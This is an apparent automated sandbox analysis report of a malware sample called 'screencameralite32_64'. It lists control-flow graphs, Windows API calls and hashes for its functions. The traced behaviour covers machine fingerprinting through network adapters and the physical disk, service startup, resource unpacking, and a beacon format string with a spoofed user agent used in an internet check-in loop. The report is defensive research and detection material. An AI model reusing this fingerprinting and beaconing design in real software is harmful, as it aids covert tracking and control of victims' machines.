                                                              control_flow_graph 837 401b4b-401b68 LoadLibraryA 838 401c21-401c25 837->838 839 401b6e-401b7f GetProcAddress 837->839 840 401b85-401b8e 839->840 841 401c18-401c1b FreeLibrary 839->841 842 401b95-401ba5 GetAdaptersInfo 840->842 841->838 843 401ba7-401bb0 842->843 844 401bdb-401be3 842->844 847 401bc1-401bd7 call 402cc0 call 4018cc 843->847 848 401bb2-401bb6 843->848 845 401be5-401beb call 402ca6 844->845 846 401bec-401bf0 844->846 845->846 851 401bf2-401bf6 846->851 852 401c15-401c17 846->852 847->844 848->844 853 401bb8-401bbf 848->853 851->852 856 401bf8-401bfb 851->856 852->841 853->847 853->848 858 401c06-401c13 call 402c98 856->858 859 401bfd-401c03 856->859 858->842 858->852 859->858
                                                              APIs
                                                              • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                              • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                              • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                              • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                              • API String ID: 514930453-3667123677
                                                              • Opcode ID: b984b7dde6bf878e61bd9d6389ae28c16a21e2d2acce5cac07de2378b9438879
                                                              • Instruction ID: 38440359ad4724572ca0372a4bc8090c683b298b5ffde01d95b1867a6a9b844d
                                                              • Opcode Fuzzy Hash: b984b7dde6bf878e61bd9d6389ae28c16a21e2d2acce5cac07de2378b9438879
                                                              • Instruction Fuzzy Hash: F921B870904109AFEF119F65C9447EF7BB8EF41344F1440BAD504B22E1E7789985CB69

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 911 2c7f8da-2c7f8fd LoadLibraryA 912 2c7f903-2c7f911 GetProcAddress 911->912 913 2c7f9bd-2c7f9c4 911->913 914 2c7f917-2c7f927 912->914 915 2c7f9b6-2c7f9b7 FreeLibrary 912->915 916 2c7f929-2c7f935 GetAdaptersInfo 914->916 915->913 917 2c7f937 916->917 918 2c7f96d-2c7f975 916->918 921 2c7f939-2c7f940 917->921 919 2c7f977-2c7f97d call 2c836eb 918->919 920 2c7f97e-2c7f983 918->920 919->920 923 2c7f985-2c7f988 920->923 924 2c7f9b1-2c7f9b5 920->924 925 2c7f942-2c7f946 921->925 926 2c7f94a-2c7f952 921->926 923->924 930 2c7f98a-2c7f98f 923->930 924->915 925->921 927 2c7f948 925->927 928 2c7f955-2c7f95a 926->928 927->918 928->928 931 2c7f95c-2c7f969 call 2c7f629 928->931 932 2c7f991-2c7f999 930->932 933 2c7f99c-2c7f9a7 call 2c83a8f 930->933 931->918 932->933 933->924 938 2c7f9a9-2c7f9ac 933->938 938->916
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02C7F8F0
                                                              • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C7F909
                                                              • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02C7F92E
                                                              • FreeLibrary.KERNEL32(00000000), ref: 02C7F9B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                              • String ID: GetAdaptersInfo$iphlpapi.dll
                                                              • API String ID: 514930453-3114217049
                                                              • Opcode ID: 191e4fbbbd107517335b78d488a7064fb5d331220321a5b36b99e35ed8adc8b8
                                                              • Instruction ID: 29de8a1ab922ee63c98874cf13c6eb37eb107913921a4c01a10551c0627130d8
                                                              • Opcode Fuzzy Hash: 191e4fbbbd107517335b78d488a7064fb5d331220321a5b36b99e35ed8adc8b8
                                                              • Instruction Fuzzy Hash: BB21D371E04209AFDB10DFB8D8C47EEBBB9AF45314F1440AEE945E7641D7309A45CBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 996 2c7f7d6-2c7f801 CreateFileA 997 2c7f807-2c7f81c 996->997 998 2c7f8d2-2c7f8d9 996->998 999 2c7f81f-2c7f841 DeviceIoControl 997->999 1000 2c7f843-2c7f84b 999->1000 1001 2c7f87a-2c7f882 999->1001 1002 2c7f854-2c7f859 1000->1002 1003 2c7f84d-2c7f852 1000->1003 1004 2c7f884-2c7f88a call 2c836eb 1001->1004 1005 2c7f88b-2c7f88d 1001->1005 1002->1001 1006 2c7f85b-2c7f863 1002->1006 1003->1001 1004->1005 1008 2c7f88f-2c7f892 1005->1008 1009 2c7f8c8-2c7f8d1 CloseHandle 1005->1009 1012 2c7f866-2c7f86b 1006->1012 1010 2c7f894-2c7f89d GetLastError 1008->1010 1011 2c7f8ae-2c7f8bb call 2c83a8f 1008->1011 1009->998 1010->1009 1014 2c7f89f-2c7f8a2 1010->1014 1011->1009 1020 2c7f8bd-2c7f8c3 1011->1020 1012->1012 1016 2c7f86d-2c7f879 call 2c7f629 1012->1016 1014->1011 1017 2c7f8a4-2c7f8ab 1014->1017 1016->1001 1017->1011 1020->999
                                                              APIs
                                                              • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02C7F7F5
                                                              • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02C7F833
                                                              • GetLastError.KERNEL32 ref: 02C7F894
                                                              • CloseHandle.KERNELBASE(?), ref: 02C7F8CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                              • String ID: \\.\PhysicalDrive0
                                                              • API String ID: 4026078076-1180397377
                                                              • Opcode ID: 86c9a51a4949e8f6311a4d33d4333904f42e9dd7cb8732eea02bfe9cbfcc22fb
                                                              • Instruction ID: 5c715d4783c0fa54a5daf2382e981046559a0790577175d6ab721305764a04e0
                                                              • Opcode Fuzzy Hash: 86c9a51a4949e8f6311a4d33d4333904f42e9dd7cb8732eea02bfe9cbfcc22fb
                                                              • Instruction Fuzzy Hash: 9331D471D00219ABDB14DF95D898BEEBBB8FF46714F20416EE504A7680D7705B04CBD0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1022 401a4f-401a77 CreateFileA 1023 401b45-401b4a 1022->1023 1024 401a7d-401a91 1022->1024 1025 401a98-401ac0 DeviceIoControl 1024->1025 1026 401ac2-401aca 1025->1026 1027 401af3-401afb 1025->1027 1030 401ad4-401ad9 1026->1030 1031 401acc-401ad2 1026->1031 1028 401b04-401b07 1027->1028 1029 401afd-401b03 call 402ca6 1027->1029 1033 401b09-401b0c 1028->1033 1034 401b3a-401b44 CloseHandle 1028->1034 1029->1028 1030->1027 1035 401adb-401af1 call 402cc0 call 4018cc 1030->1035 1031->1027 1037 401b27-401b34 call 402c98 1033->1037 1038 401b0e-401b17 GetLastError 1033->1038 1034->1023 1035->1027 1037->1025 1037->1034 1038->1034 1040 401b19-401b1c 1038->1040 1040->1037 1043 401b1e-401b24 1040->1043 1043->1037
                                                              APIs
                                                              • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                              • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                              • GetLastError.KERNEL32 ref: 00401B0E
                                                              • CloseHandle.KERNELBASE(?), ref: 00401B3D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                              • String ID: \\.\PhysicalDrive0
                                                              • API String ID: 4026078076-1180397377
                                                              • Opcode ID: 3afb43cc3dedd2849d90584800b0b4b1cc754ecdd9339dbac4238ad8ee4012bf
                                                              • Instruction ID: fc4aaa1cf60edb7db06fdbd05dea25136cd7d186831ecbc7bbbcf924abbffa34
                                                              • Opcode Fuzzy Hash: 3afb43cc3dedd2849d90584800b0b4b1cc754ecdd9339dbac4238ad8ee4012bf
                                                              • Instruction Fuzzy Hash: 74318B71D00218EADB21AFA5CD849EFBBB9FF41750F20407AE554B32A0E7785E45CB98

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1075 402321-4025fe 1077 40d168-40d2c6 GetCommandLineW CommandLineToArgvW GetLocalTime call 401f27 1075->1077 1078 4028ea-4028ed 1075->1078 1077->1078 1085 40d2cc-40d2d1 1077->1085 1080 40d83f-40d840 1078->1080 1082 40d81d-40d823 StartServiceCtrlDispatcherA 1080->1082 1082->1080 1085->1082
                                                              APIs
                                                              • GetCommandLineW.KERNEL32(?), ref: 0040D168
                                                              • CommandLineToArgvW.SHELL32(00000000), ref: 0040D16F
                                                              • GetLocalTime.KERNEL32(0040C2B8), ref: 0040D26E
                                                              • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040D81D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: CommandLine$ArgvCtrlDispatcherLocalServiceStartTime
                                                              • String ID: /chk
                                                              • API String ID: 3216853668-3837807730
                                                              • Opcode ID: 0a51c36515c2853d2568864ea3575acc16fa093d8468cbf5ee40c346e44038a5
                                                              • Instruction ID: 5b821ef790936c2cfb0355a592b8cec6e1fea295cd619999a9cb1ab733abd2f0
                                                              • Opcode Fuzzy Hash: 0a51c36515c2853d2568864ea3575acc16fa093d8468cbf5ee40c346e44038a5
                                                              • Instruction Fuzzy Hash: AEF09035C0C242EEC70067E09E5C46937A8AD0A341320487BE097BA0D0CA38440FA72E

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 472 2c76440-2c7646c 473 2c76412-2c76413 472->473 474 2c7646e 472->474 473->472 475 2c76477-2c7648a 474->475 476 2c76470-2c76472 474->476 478 2c764e2-2c766f1 GetModuleHandleA GetProcAddress call 2c742c7 GetTickCount call 2c7605a GetVersionExA call 2c84a30 call 2c82eec * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2c84a30 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2c82eec * 4 QueryPerformanceCounter Sleep call 2c82eec * 2 call 2c84a30 * 2 475->478 477 2c76474-2c76475 476->477 476->478 477->475 523 2c766f4-2c766f6 478->523 524 2c766ff-2c76701 523->524 525 2c766f8-2c766fd 523->525 527 2c76703 524->527 528 2c7670e-2c76742 RtlEnterCriticalSection RtlLeaveCriticalSection 524->528 526 2c76708 Sleep 525->526 526->528 527->526 529 2c76744-2c76750 528->529 530 2c76792 528->530 529->530 532 2c76752-2c7675f 529->532 531 2c76796-2c772c3 InternetOpenA 530->531 537 2c77389-2c7738f 531->537 538 2c772c9-2c77340 InternetSetOptionA * 3 call 2c84a30 InternetOpenUrlA 531->538 534 2c76767-2c76768 532->534 535 2c76761-2c76765 532->535 536 2c7676c-2c76790 call 2c84a30 * 2 534->536 535->536 536->531 540 2c77391-2c77397 537->540 541 2c773ab-2c773b9 537->541 549 2c77382-2c77383 InternetCloseHandle 538->549 550 2c77342 538->550 545 2c7739d-2c773aa call 2c753ec 540->545 546 2c77399-2c7739b 540->546 541->523 543 2c773bf-2c773e3 call 2c84a30 call 2c7439c 541->543 543->523 561 2c773e9-2c77417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2c8227c 543->561 545->541 546->541 549->537 554 2c77346-2c7736c InternetReadFile 550->554 558 2c77377-2c7737e InternetCloseHandle 554->558 559 2c7736e-2c77375 554->559 558->549 559->554 564 2c7746d-2c77488 call 2c8227c 561->564 565 2c77419-2c7742b call 2c8227c 561->565 570 2c77742-2c77754 call 2c8227c 564->570 571 2c7748e-2c77490 564->571 565->564 572 2c7742d-2c7743f call 2c8227c 565->572 579 2c77756-2c77758 570->579 580 2c7779d-2c777af call 2c8227c 570->580 571->570 574 2c77496-2c77548 call 2c82eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2c84a30 * 5 call 2c7439c * 2 571->574 572->564 582 2c77441-2c77453 call 2c8227c 572->582 638 2c77585 574->638 639 2c7754a-2c7754c 574->639 579->580 585 2c7775a-2c77798 call 2c84a30 RtlEnterCriticalSection RtlLeaveCriticalSection 579->585 591 2c777b1-2c777cb call 2c761f5 call 2c76303 call 2c7640e 580->591 592 2c777d0-2c777e2 call 2c8227c 580->592 582->564 593 2c77455-2c77467 call 2c8227c 582->593 585->523 591->523 606 2c77b00-2c77b12 call 2c8227c 592->606 607 2c777e8-2c777ea 592->607 593->523 593->564 606->523 618 2c77b18-2c77b46 call 2c82eec call 2c84a30 call 2c7439c 606->618 607->606 611 2c777f0-2c77807 call 2c7439c 607->611 611->523 620 2c7780d-2c778db call 2c82358 call 2c71ba7 611->620 640 2c77b4f-2c77b56 call 2c82eb4 618->640 641 2c77b48-2c77b4a call 2c7534d 618->641 636 2c778e2-2c77903 RtlEnterCriticalSection 620->636 637 2c778dd call 2c7143f 620->637 644 2c77905-2c7790c 636->644 645 2c7790f-2c77973 RtlLeaveCriticalSection call 2c73c67 call 2c73d7e call 2c7826e 636->645 637->636 642 2c77589-2c775b7 call 2c82eec call 2c84a30 call 2c7439c 638->642 639->638 646 2c7754e-2c77560 call 2c8227c 639->646 640->523 641->640 669 2c775b9-2c775c8 call 2c83529 642->669 670 2c775f8-2c77601 call 2c82eb4 642->670 644->645 667 2c77ae7-2c77afb call 2c78f36 645->667 668 2c77979-2c779c1 call 2c7a658 645->668 646->638 658 2c77562-2c77583 call 2c7439c 646->658 658->642 667->523 679 2c779c7-2c779ce 668->679 680 2c77ab1-2c77ae2 call 2c7831d call 2c733b2 668->680 669->670 683 2c775ca 669->683 681 2c77607-2c7761f call 2c83a8f 670->681 682 2c77738-2c7773b 670->682 685 2c779d1-2c779d6 679->685 680->667 694 2c77621-2c77629 call 2c7966a 681->694 695 2c7762b 681->695 682->570 687 2c775cf-2c775e1 call 2c82790 683->687 685->685 689 2c779d8-2c77a23 call 2c7a658 685->689 697 2c775e6-2c775f6 call 2c83529 687->697 698 2c775e3 687->698 689->680 703 2c77a29-2c77a2f 689->703 701 2c7762d-2c776e5 call 2c7a782 call 2c73863 call 2c75119 call 2c73863 call 2c7aa28 call 2c7ab42 694->701 695->701 697->670 697->687 698->697 725 2c776e7 call 2c7380b 701->725 726 2c776ec-2c77717 Sleep call 2c81830 701->726 708 2c77a32-2c77a37 703->708 708->708 710 2c77a39-2c77a74 call 2c7a658 708->710 710->680 716 2c77a76-2c77ab0 call 2c7d04a 710->716 716->680 725->726 730 2c77723-2c77731 726->730 731 2c77719-2c77722 call 2c74100 726->731 730->682 733 2c77733 call 2c7380b 730->733 731->730 733->682
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C764E9
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02C764EC
                                                              • GetTickCount.KERNEL32 ref: 02C764F8
                                                              • GetVersionExA.KERNEL32(02CA7010), ref: 02C76525
                                                              • _malloc.LIBCMT ref: 02C76551
                                                              • _malloc.LIBCMT ref: 02C76561
                                                              • _malloc.LIBCMT ref: 02C7656C
                                                              • _malloc.LIBCMT ref: 02C76577
                                                              • _malloc.LIBCMT ref: 02C76582
                                                              • _malloc.LIBCMT ref: 02C7658D
                                                              • _malloc.LIBCMT ref: 02C76598
                                                              • _malloc.LIBCMT ref: 02C765A7
                                                              • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C765BE
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02C765C7
                                                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C765D6
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02C765D9
                                                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C765E4
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02C765E7
                                                              • RtlEnterCriticalSection.NTDLL(02CA71B8), ref: 02C76621
                                                              • RtlLeaveCriticalSection.NTDLL(02CA71B8), ref: 02C7662E
                                                              Strings
                                                              • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02C76739
                                                              • cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d, xrefs: 02C7666F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _malloc$Heap$AllocateProcess$CriticalSection$AddressCountEnterHandleLeaveModuleProcTickVersion
                                                              • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d
                                                              • API String ID: 4280160329-3100210275
                                                              • Opcode ID: 2732e6294634f9f782845ebb7d556df8ecb9bea5ec4760cd4c0bf8fd3e80b505
                                                              • Instruction ID: 8dea513e354d863ac9080c283f4b67aabc90a45e1a1d39557daad866bca77c97
                                                              • Opcode Fuzzy Hash: 2732e6294634f9f782845ebb7d556df8ecb9bea5ec4760cd4c0bf8fd3e80b505
                                                              • Instruction Fuzzy Hash: 5271B6B2D443909FD310BF749C48B5FBBE9AF85314F10482DFA859B241EAB45404DF96

                                                              Control-flow Graph

                                                              APIs
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C71D11
                                                              • GetLastError.KERNEL32 ref: 02C71D23
                                                                • Part of subcall function 02C71712: __EH_prolog.LIBCMT ref: 02C71717
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C71D59
                                                              • GetLastError.KERNEL32 ref: 02C71D6B
                                                              • __beginthreadex.LIBCMT ref: 02C71DB1
                                                              • GetLastError.KERNEL32 ref: 02C71DC6
                                                              • CloseHandle.KERNEL32(00000000), ref: 02C71DDD
                                                              • CloseHandle.KERNEL32(00000000), ref: 02C71DEC
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C71E14
                                                              • CloseHandle.KERNELBASE(00000000), ref: 02C71E1B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                              • String ID: thread$thread.entry_event$thread.exit_event
                                                              • API String ID: 831262434-3017686385
                                                              • Opcode ID: 9f582daf9906074f626d9da27d016146aff98a4927be1cf7b43c9dd3f84c4317
                                                              • Instruction ID: 0b6e2beabe1f02d96bc9c6a87cf428c14e3b508399727fa4690a6bfb0503bf23
                                                              • Opcode Fuzzy Hash: 9f582daf9906074f626d9da27d016146aff98a4927be1cf7b43c9dd3f84c4317
                                                              • Instruction Fuzzy Hash: C2317EB19403019FD700EF24C888B6BBBA5FF84754F144A6DF9599B290DB709949CFD2

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02C74D8B
                                                              • RtlEnterCriticalSection.NTDLL(02CA71B8), ref: 02C74DB7
                                                              • RtlLeaveCriticalSection.NTDLL(02CA71B8), ref: 02C74DC3
                                                                • Part of subcall function 02C74BED: __EH_prolog.LIBCMT ref: 02C74BF2
                                                                • Part of subcall function 02C74BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02C74CF2
                                                              • RtlEnterCriticalSection.NTDLL(02CA71B8), ref: 02C74E93
                                                              • RtlLeaveCriticalSection.NTDLL(02CA71B8), ref: 02C74E99
                                                              • RtlEnterCriticalSection.NTDLL(02CA71B8), ref: 02C74EA0
                                                              • RtlLeaveCriticalSection.NTDLL(02CA71B8), ref: 02C74EA6
                                                              • RtlEnterCriticalSection.NTDLL(02CA71B8), ref: 02C750A7
                                                              • RtlLeaveCriticalSection.NTDLL(02CA71B8), ref: 02C750AD
                                                              • RtlEnterCriticalSection.NTDLL(02CA71B8), ref: 02C750B8
                                                              • RtlLeaveCriticalSection.NTDLL(02CA71B8), ref: 02C750C1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                              • String ID:
                                                              • API String ID: 2062355503-0
                                                              • Opcode ID: 886b1ef5b6d02f4ad7b50769cf93f07fefeba751979f53a49318e41e25822837
                                                              • Instruction ID: 4b9796b5c36eb27c8c9398dce4637db422c23e887fa9de9ff1a6e812780010b0
                                                              • Opcode Fuzzy Hash: 886b1ef5b6d02f4ad7b50769cf93f07fefeba751979f53a49318e41e25822837
                                                              • Instruction Fuzzy Hash: 39B16C71D0025EDFEF25DFA0C844BEEBBB9AF44314F14409AE80576280DB755A89DFA2

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 863 401f64-401f84 FindResourceA 864 401f86-401f9d GetLastError SizeofResource 863->864 865 401f9f-401fa1 863->865 864->865 866 401fa6-401fec LoadResource LockResource GlobalAlloc call 402900 * 2 864->866 867 402096-40209a 865->867 872 401fee-401ff9 866->872 872->872 873 401ffb-402003 GetTickCount 872->873 874 402032-402038 873->874 875 402005-402007 873->875 876 402053-402083 GlobalAlloc call 401c26 874->876 877 40203a-40204a 874->877 875->876 878 402009-40200f 875->878 883 402088-402093 876->883 879 40204c 877->879 880 40204e-402051 877->880 878->876 882 402011-402023 878->882 879->880 880->876 880->877 884 402025 882->884 885 402027-40202a 882->885 883->867 884->885 885->882 886 40202c-40202e 885->886 886->878 887 402030 886->887 887->876
                                                              APIs
                                                              • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                              • GetLastError.KERNEL32 ref: 00401F86
                                                              • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                              • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                              • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                              • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                              • GetTickCount.KERNEL32 ref: 00401FFB
                                                              • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2964215788.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000002.00000002.2964215788.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_400000_screencameralite32_64.jbxd
                                                              Similarity
                                                              • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                              • String ID:
                                                              • API String ID: 564119183-0
                                                              • Opcode ID: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                              • Instruction ID: 5f40b5bb2c798fd06435bc38b1d437300a77b6e6fc54339f6675bf13ecd45336
                                                              • Opcode Fuzzy Hash: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                              • Instruction Fuzzy Hash: 45314E71A00255AFDB105FB59F8896F7F68EF45344F10807AFE86F7281DA748845C7A8

                                                              Control-flow Graph

                                                              APIs
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C72706
                                                              • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02C7272B
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C95A93), ref: 02C72738
                                                                • Part of subcall function 02C71712: __EH_prolog.LIBCMT ref: 02C71717
                                                              • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02C72778
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C727D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                              • String ID: timer
                                                              • API String ID: 4293676635-1792073242
                                                              • Opcode ID: 6ee8b5a31fa9b1e4cdd18206dadee84faf593f2d8628def32fa26e6fde85ef8d
                                                              • Instruction ID: 2abeb5947608e23070ff0472c28fbc34bc6c27b9d6996a4f3e17de4c4cadd0ad
                                                              • Opcode Fuzzy Hash: 6ee8b5a31fa9b1e4cdd18206dadee84faf593f2d8628def32fa26e6fde85ef8d
                                                              • Instruction Fuzzy Hash: 1231AEB1945706EFD310DF65CA88B66BBE8FB48724F004A2EF85583A80D770E914CF92

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 939 2c72b95-2c72baf 940 2c72bc7-2c72bcb 939->940 941 2c72bb1-2c72bb9 call 2c80a50 939->941 943 2c72bdf 940->943 944 2c72bcd-2c72bd0 940->944 949 2c72bbf-2c72bc2 941->949 945 2c72be2-2c72c11 WSASetLastError WSARecv call 2c7a43c 943->945 944->943 947 2c72bd2-2c72bdd call 2c80a50 944->947 951 2c72c16-2c72c1d 945->951 947->949 952 2c72d30 949->952 954 2c72c1f-2c72c2a call 2c80a50 951->954 955 2c72c2c-2c72c32 951->955 956 2c72d32-2c72d38 952->956 964 2c72c3f-2c72c42 954->964 958 2c72c46-2c72c48 955->958 959 2c72c34-2c72c39 call 2c80a50 955->959 962 2c72c4f-2c72c60 call 2c80a50 958->962 963 2c72c4a-2c72c4d 958->963 959->964 962->956 966 2c72c66-2c72c69 962->966 963->966 964->958 968 2c72c73-2c72c76 966->968 969 2c72c6b-2c72c6d 966->969 968->952 972 2c72c7c-2c72c9a call 2c80a50 call 2c7166f 968->972 969->968 971 2c72d22-2c72d2d call 2c71996 969->971 971->952 979 2c72cbc-2c72cfa WSASetLastError select call 2c7a43c 972->979 980 2c72c9c-2c72cba call 2c80a50 call 2c7166f 972->980 985 2c72cfc-2c72d06 call 2c80a50 979->985 986 2c72d08 979->986 980->952 980->979 994 2c72d19-2c72d1d 985->994 989 2c72d15-2c72d17 986->989 990 2c72d0a-2c72d12 call 2c80a50 986->990 989->952 989->994 990->989 994->945
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02C72BE4
                                                              • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02C72C07
                                                                • Part of subcall function 02C7A43C: WSAGetLastError.WS2_32(00000000,?,?,02C72A51), ref: 02C7A44A
                                                              • WSASetLastError.WS2_32 ref: 02C72CD3
                                                              • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02C72CE7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2965569706.0000000002C71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C71000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_2c71000_screencameralite32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$Recvselect
                                                              • String ID: 3'
                                                              • API String ID: 886190287-280543908
                                                              • Opcode ID: 88c023b1a9bf5c22916d209f714c7b005651ef70060765043ed236aa852811ee
                                                              • Instruction ID: 96f6275efd123f69c01f76d773c816be3abb622ebc3850ba2b6815a4de9a9580
